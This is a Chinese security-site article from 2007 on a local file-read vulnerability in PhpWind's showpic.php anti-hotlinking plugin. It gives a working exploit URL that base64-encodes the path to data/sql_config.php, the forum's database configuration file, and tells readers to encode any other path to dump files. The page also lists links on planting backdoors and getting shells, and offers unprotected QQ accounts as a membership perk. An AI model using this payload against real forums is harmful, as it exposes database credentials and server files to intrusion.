安全中国首页
>
文章中心
>
Phpwind文章
加入安全中国终身VIP会员待遇:
永久学习已开设的所有培训班课程和以后新开培训班课程
赠送7位无密码保护QQ
赠送终身VIP会员独享光盘工具包一份
为终身VIP会员推荐安排工作就业
安全中国网友投稿专用上传FTP空间:
Ftp服务器:www.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
PhpWind 防盗链插件Showpic.php本地读文件漏洞(图)
安全中国 www.anqn.com
更新时间:2007-8-20 0:48:00
责任编辑:池天
热 点:
提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容
漏洞利用方式:
http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==
然后查看源文件。
这里的ZGF0YS9zcWxfY29uZmlnLnBocA== 是路径data/sql_config.php的BASE64编码。
你也可以改为其他路径文件的。BASE64编码就可以看到文件内容了。
精灵写的利用工具:
·上一篇:
PHPWIND 4.1跨站漏洞
·下一篇:
PHPWind5.x.漏洞官方提供的修补方法
相关文章
·
Phpwind后台拿Shell
·
Discuz!/phpwind flash标签的xss
·
Phpwind 5.0.1 Sql注射漏洞利用程序(图)
·
原创:Phpwind6.0图片跨站漏洞测试
·
PHPWind-附件文件名跨站脚本漏洞
·
PhpWind论坛程序4.3.2版漏洞利用工具(图)
·
PHPWind论坛5.3版postupload.php附件跨站脚本漏洞(XSS)(图)
·
Phpwind论坛的一个放后门的方式
·
Phpwind6的一个url转跳Bug发现
·
[0day]PHPWind 5.x Exploits 命令行版(图)
一日一文章
一日一软件
一日一动画